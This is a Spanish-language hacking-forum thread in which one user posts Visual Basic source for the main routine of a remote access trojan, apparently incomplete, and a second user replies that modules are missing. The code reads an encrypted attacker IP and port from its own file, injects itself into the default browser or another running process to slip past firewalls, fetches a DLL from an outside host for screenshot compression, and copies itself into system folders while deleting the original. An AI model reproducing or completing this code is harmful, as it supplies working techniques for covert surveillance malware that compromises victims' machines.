INJECT PROCESS BY PASS FIRWALLS

Iniciado por astaroth_15, 24 Marzo 2008, 06:27 AM


astaroth_15

Option Explicit
Public Const FINAL_PROGRAM_SIZE = 61440
Public Const PassString As String = "password"
Public Const ServerPass As String = ""
Public IpToConnectTo As String, PortToConnectTo As Long
Public UserConnected As Long, MeltToFile As String, MeltToDirectory As String

Sub Main()
'On Error Resume Next
'
Dim s1 As String, sFile As String
Dim strInfo() As String
Dim ServerFile As String, EncryptedInfo As String
Dim s2 As String, ServerBytes() As Byte, b1() As Byte, MeltDir As Long
Dim InjectedProcesses() As String, ProcessToInject As String
Dim i1 As Long, i2 As Long, i3 As Long

EncryptedInfo = SysDir & "ei_log.log"
If FileExists(EncryptedInfo) Then
    If FileLen(EncryptedInfo) = 0 Then
        DeleteFile EncryptedInfo
        ShellExecute 0, "", AppExe, 0, "", 1
        End
    End If
    'firewall bypass
    'this part of the program reads itself.
    'a file was stored in the other instance that is now available for use
    'so you have to collect the RAT [stored] data and use it in the RAT
    sFile = DecryptString(StrConv(vbReadEndFile(EncryptedInfo, 0), vbFromUnicode), PassString)
    s1 = sFile
    IpToConnectTo = Mid(s1, InStr(1, s1, "{01=") + 4, InStr(1, s1, "=01}") - InStr(1, s1, "{01=") - 4)
    PortToConnectTo = CLng(Mid(s1, InStr(1, s1, "{02=") + 4, InStr(1, s1, "=02}") - InStr(1, s1, "{02=") - 4))
    MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
    MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
    Select Case MeltDir
        Case 0
            MeltToDirectory = SysDir
        Case 1
           MeltToDirectory = WinDir
       Case 2
            MeltToDirectory = AppPath
        Case 3
            MeltToDirectory = GetTempPath
    End Select
    MeltToFile = LCase(MeltToDirectory & MeltToFile)
   
    'if user doesnt have zLib, download it now for compression
    'this will make the 2.5 mb screenshots ~50kb, and still crystal clear picture
    If UserHasZLIB = 0 Then
        DeleteFile SysDir & "zlib.dll"
        Call GetInternetFile("http://www.hotlinkfiles.com/files/878001_9nuek/zlib.dll", SysDir & "zlib.dll", 256)
    End If
   
    DeleteFile EncryptedInfo
    Load frmMain
    frmMain.Show
Else
    'default when user opens.. right here we want to store the RAT's
    'information so that the firewall bypass can read it, avoiding registry.
    'might as well encrypt the file
    'soo in a nutshell..
    'this part of the program reads itself and stores the information for
    'access to the next loaded version with FWB+
    'i keep these notes to help me remind myself.
   
    'open itself and decrypt string
    ServerBytes = vbReadEndFile(AppExe, FINAL_PROGRAM_SIZE)
    sFile = CStr(ServerBytes())
   
    ServerBytes = sFile
    DeleteFile EncryptedInfo
    vbWriteByteFile EncryptedInfo, ServerBytes
   
    sFile = DecryptString(sFile, PassString)
   
    '=================================
    '
    'Find a process to inject to, with internet access
    '
    '=================================
       
    s2 = Mid(sFile, InStr(1, sFile, "{08=") + 4, InStr(1, sFile, "=08}") - InStr(1, sFile, "{08=") - 4)
    If InStr(1, s2, "|") Then
        InjectedProcesses = Split(s2, "|")
        For i1 = LBound(InjectedProcesses) To UBound(InjectedProcesses)
                If LCase(InjectedProcesses(i1)) = LCase("[DefaultBrowser]") Then
                'If we hit the default browser, we are just gonna load into it
                    InjectedProcesses(i1) = ExeRegPath(DefaultBrowser)
                    If FileExists(InjectedProcesses(i1)) Then
                        'the browser exists, inject into it
                        ProcessToInject = InjectedProcesses(i1)
                    Else
                        If Len(s2) = 0 Then
                                'alternative find default browser through Shell32
                               
                        End If
                    End If
                    i1 = UBound(InjectedProcesses)
                End If
            If IsProcessEXERunning(InjectedProcesses(i1)) Then
                'process running , run one after
                ProcessToInject = AppFullPath(InjectedProcesses(i1))
               
                i1 = UBound(InjectedProcesses)
            End If
        Next
        If ProcessToInject = "" Then ProcessToInject = ExeRegPath(DefaultBrowser)
    End If
    '=================================
    '
    'Determine if we need to melt
    '
    '=================================
    MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
    MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
    Select Case MeltDir
        Case 0
            MeltToDirectory = SysDir
        Case 1
           MeltToDirectory = WinDir
       Case 2
            MeltToDirectory = AppPath
        Case 3
            MeltToDirectory = GetTempPath
    End Select
    MeltToFile = LCase(MeltToDirectory & MeltToFile)
    If LCase(AppExe) <> MeltToFile Then
        'we need to melt
        DeleteFile MeltToFile
        If MeltDir <> 2 Then FileCopy AppExe, MeltToFile
        b1 = LoadFile(AppExe)
        If MeltDir <> 2 Then InitiateMelt
        RunExe ProcessToInject, b1
        Exit Sub
    Else
        'shouldnt be occuring!!
        'program will uninstall after this
        DeleteFile EncryptedInfo
        MsgBox "Program Detection Error"
        InitiateMelt
        End
    End If
End If
End Sub









PROBAR SI SIRVE ESTO :s

GroK

Ese código está incompleto, le faltan módulos.

Saludos